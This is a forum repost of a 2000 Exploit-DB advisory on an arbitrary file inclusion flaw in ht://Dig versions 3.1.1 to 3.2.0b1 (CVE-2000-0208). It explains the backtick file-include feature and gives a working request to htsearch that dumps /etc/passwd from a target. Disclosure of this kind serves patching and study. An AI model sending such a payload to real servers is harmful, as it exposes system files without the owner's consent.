Exploit The ht://Dig Group ht://Dig 3.1.1/3.1.2/3.1.3/3.1.4/3.2 .0b1 - Arbitrary File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
19785
Проверка EDB
  1. Пройдено
Автор
GEOFF HUTCHISON
Тип уязвимости
REMOTE
Платформа
UNIX
CVE
cve-2000-0208
Дата публикации
2000-02-29
The ht://Dig Group ht://Dig 3.1.1/3.1.2/3.1.3/3.1.4/3.2 .0b1 - Arbitrary File Inclusion
Код:
source: https://www.securityfocus.com/bid/1026/info

ht://dig is a web content search engine for Unix platforms. The software is set up to allow for file inclusion from configuration files. Any string surrounded by the opening singlw quote character ( ` ) is taken as a path to a file for inclusion, for example:
some_parameter:	`var/htdig/some_file`

htdig will also allow included files to be specified via form input. Therefore, any file can be specified for inclusion into a variable by any web user.

The URL:
http ://target/cgi-bin/htsearch?Exclude=%60/etc/passwd%60
will return a page with the contents of /etc/passwd in the 'exclude' field.
 
Источник
www.exploit-db.com

Похожие темы